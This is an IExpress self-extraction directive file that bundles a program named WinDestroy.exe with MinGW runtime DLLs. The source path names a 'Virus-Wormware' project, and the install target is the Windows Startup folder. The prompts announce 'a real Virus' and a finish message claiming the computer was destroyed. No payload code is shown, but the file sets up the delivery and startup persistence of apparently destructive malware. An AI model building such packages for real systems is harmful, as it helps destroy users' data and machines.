[Version]
Class=IEXPRESS
SEDVersion=3
[Options]
PackagePurpose=InstallApp
ShowInstallProgramWindow=0
HideExtractAnimation=0
UseLongFileName=0
InsideCompressed=0
CAB_FixedSize=0
CAB_ResvCodeSigning=0
RebootMode=AS
InstallPrompt=%InstallPrompt%
DisplayLicense=%DisplayLicense%
FinishMessage=%FinishMessage%
TargetName=%TargetName%
FriendlyName=%FriendlyName%
AppLaunched=%AppLaunched%
PostInstallCmd=%PostInstallCmd%
AdminQuietInstCmd=%AdminQuietInstCmd%
UserQuietInstCmd=%UserQuietInstCmd%
SourceFiles=SourceFiles
[Strings]
InstallPrompt=This is a real Virus. Are you sure to run it?
DisplayLicense=
FinishMessage=Successfully Destroyed your Computer
TargetName=C:\Users\pppmi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.EXE
FriendlyName=WinDestroy
AppLaunched=WinDestroy.exe
PostInstallCmd=<None>
AdminQuietInstCmd=
UserQuietInstCmd=
FILE0="WinDestroy.exe"
FILE1="libatomic-1.dll"
FILE2="libgcc_s_seh-1.dll"
FILE3="libgomp-1.dll"
FILE4="libquadmath-0.dll"
FILE5="libssp-0.dll"
FILE6="libstdc++-6.dll"
FILE7="libwinpthread-1.dll"
[SourceFiles]
SourceFiles0=C:\Users\pppmi\Documents\GitHub\Virus-Wormware\bin\
SourceFiles1=C:\Users\pppmi\Documents\RANDOMS\VMSHARE\DLL\
[SourceFiles0]
%FILE0%=
[SourceFiles1]
%FILE1%=
%FILE2%=
%FILE3%=
%FILE4%=
%FILE5%=
%FILE6%=
%FILE7%=
